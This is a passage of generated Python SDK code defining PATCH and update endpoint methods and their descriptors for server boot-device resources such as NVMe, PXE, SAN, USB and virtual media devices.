    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_nvme_device'] = boot_nvme_device
    return self.call_with_http_info(**kwargs)
self.patch_boot_nvme_device = _Endpoint(
    settings={
        'response_type': (BootNvmeDevice,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/NvmeDevices/{Moid}',
        'operation_id': 'patch_boot_nvme_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_nvme_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_nvme_device',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_nvme_device': (BootNvmeDevice,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_nvme_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_nvme_device
)
def __patch_boot_pch_storage_device(
    self,
    moid,
    boot_pch_storage_device,
    **kwargs
):
    """Update a 'boot.PchStorageDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_pch_storage_device(moid, boot_pch_storage_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_pch_storage_device (BootPchStorageDevice): The 'boot.PchStorageDevice' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootPchStorageDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_pch_storage_device'] = boot_pch_storage_device
    return self.call_with_http_info(**kwargs)
self.patch_boot_pch_storage_device = _Endpoint(
    settings={
        'response_type': (BootPchStorageDevice,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PchStorageDevices/{Moid}',
        'operation_id': 'patch_boot_pch_storage_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_pch_storage_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_pch_storage_device',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_pch_storage_device': (BootPchStorageDevice,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_pch_storage_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_pch_storage_device
)
def __patch_boot_precision_policy(
    self,
    moid,
    boot_precision_policy,
    **kwargs
):
    """Update a 'boot.PrecisionPolicy' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_precision_policy(moid, boot_precision_policy, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_precision_policy (BootPrecisionPolicy): The 'boot.PrecisionPolicy' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootPrecisionPolicy
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_precision_policy'] = boot_precision_policy
    return self.call_with_http_info(**kwargs)
self.patch_boot_precision_policy = _Endpoint(
    settings={
        'response_type': (BootPrecisionPolicy,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
        'operation_id': 'patch_boot_precision_policy',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_precision_policy',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_precision_policy',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_precision_policy': (BootPrecisionPolicy,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_precision_policy': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_precision_policy
)
def __patch_boot_pxe_device(
    self,
    moid,
    boot_pxe_device,
    **kwargs
):
    """Update a 'boot.PxeDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_pxe_device(moid, boot_pxe_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_pxe_device (BootPxeDevice): The 'boot.PxeDevice' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootPxeDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_pxe_device'] = boot_pxe_device
    return self.call_with_http_info(**kwargs)
self.patch_boot_pxe_device = _Endpoint(
    settings={
        'response_type': (BootPxeDevice,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PxeDevices/{Moid}',
        'operation_id': 'patch_boot_pxe_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_pxe_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_pxe_device',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_pxe_device': (BootPxeDevice,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_pxe_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_pxe_device
)
def __patch_boot_san_device(
    self,
    moid,
    boot_san_device,
    **kwargs
):
    """Update a 'boot.SanDevice' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.patch_boot_san_device(moid, boot_san_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_san_device (BootSanDevice): The 'boot.SanDevice' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootSanDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_san_device'] = boot_san_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PATCH /api/v1/boot/SanDevices/{Moid}; dispatches
# to the __patch_boot_san_device closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.patch_boot_san_device = _Endpoint(
    settings={
        'response_type': (BootSanDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SanDevices/{Moid}',
        'operation_id': 'patch_boot_san_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_san_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_san_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_san_device':
                (BootSanDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_san_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_san_device
)
def __patch_boot_sd_device(
    self,
    moid,
    boot_sd_device,
    **kwargs
):
    """Update a 'boot.SdDevice' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.patch_boot_sd_device(moid, boot_sd_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_sd_device (BootSdDevice): The 'boot.SdDevice' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootSdDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_sd_device'] = boot_sd_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PATCH /api/v1/boot/SdDevices/{Moid}; dispatches
# to the __patch_boot_sd_device closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.patch_boot_sd_device = _Endpoint(
    settings={
        'response_type': (BootSdDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SdDevices/{Moid}',
        'operation_id': 'patch_boot_sd_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_sd_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_sd_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_sd_device':
                (BootSdDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_sd_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_sd_device
)
def __patch_boot_uefi_shell_device(
    self,
    moid,
    boot_uefi_shell_device,
    **kwargs
):
    """Update a 'boot.UefiShellDevice' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.patch_boot_uefi_shell_device(moid, boot_uefi_shell_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_uefi_shell_device (BootUefiShellDevice): The 'boot.UefiShellDevice' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootUefiShellDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_uefi_shell_device'] = boot_uefi_shell_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PATCH /api/v1/boot/UefiShellDevices/{Moid};
# dispatches to the __patch_boot_uefi_shell_device closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.patch_boot_uefi_shell_device = _Endpoint(
    settings={
        'response_type': (BootUefiShellDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/UefiShellDevices/{Moid}',
        'operation_id': 'patch_boot_uefi_shell_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_uefi_shell_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_uefi_shell_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_uefi_shell_device':
                (BootUefiShellDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_uefi_shell_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_uefi_shell_device
)
def __patch_boot_usb_device(
    self,
    moid,
    boot_usb_device,
    **kwargs
):
    """Update a 'boot.UsbDevice' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.patch_boot_usb_device(moid, boot_usb_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_usb_device (BootUsbDevice): The 'boot.UsbDevice' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootUsbDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_usb_device'] = boot_usb_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PATCH /api/v1/boot/UsbDevices/{Moid}; dispatches
# to the __patch_boot_usb_device closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.patch_boot_usb_device = _Endpoint(
    settings={
        'response_type': (BootUsbDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/UsbDevices/{Moid}',
        'operation_id': 'patch_boot_usb_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_usb_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_usb_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_usb_device':
                (BootUsbDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_usb_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_usb_device
)
def __patch_boot_vmedia_device(
    self,
    moid,
    boot_vmedia_device,
    **kwargs
):
    """Update a 'boot.VmediaDevice' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.patch_boot_vmedia_device(moid, boot_vmedia_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_vmedia_device (BootVmediaDevice): The 'boot.VmediaDevice' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootVmediaDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_vmedia_device'] = boot_vmedia_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PATCH /api/v1/boot/VmediaDevices/{Moid};
# dispatches to the __patch_boot_vmedia_device closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.patch_boot_vmedia_device = _Endpoint(
    settings={
        'response_type': (BootVmediaDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/VmediaDevices/{Moid}',
        'operation_id': 'patch_boot_vmedia_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_vmedia_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_vmedia_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_vmedia_device':
                (BootVmediaDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_vmedia_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_vmedia_device
)
def __update_boot_cdd_device(
    self,
    moid,
    boot_cdd_device,
    **kwargs
):
    """Update a 'boot.CddDevice' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.update_boot_cdd_device(moid, boot_cdd_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_cdd_device (BootCddDevice): The 'boot.CddDevice' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootCddDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_cdd_device'] = boot_cdd_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for the update operation on
# /api/v1/boot/CddDevices/{Moid}; dispatches to the
# __update_boot_cdd_device closure defined above.  (Intersight models
# "update" as POST to the instance URL; PATCH is a separate operation.)
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.update_boot_cdd_device = _Endpoint(
    settings={
        'response_type': (BootCddDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/CddDevices/{Moid}',
        'operation_id': 'update_boot_cdd_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_cdd_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_cdd_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_cdd_device':
                (BootCddDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_cdd_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_cdd_device
)
def __update_boot_device_boot_mode(
    self,
    moid,
    boot_device_boot_mode,
    **kwargs
):
    """Update a 'boot.DeviceBootMode' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.update_boot_device_boot_mode(moid, boot_device_boot_mode, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_device_boot_mode (BootDeviceBootMode): The 'boot.DeviceBootMode' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
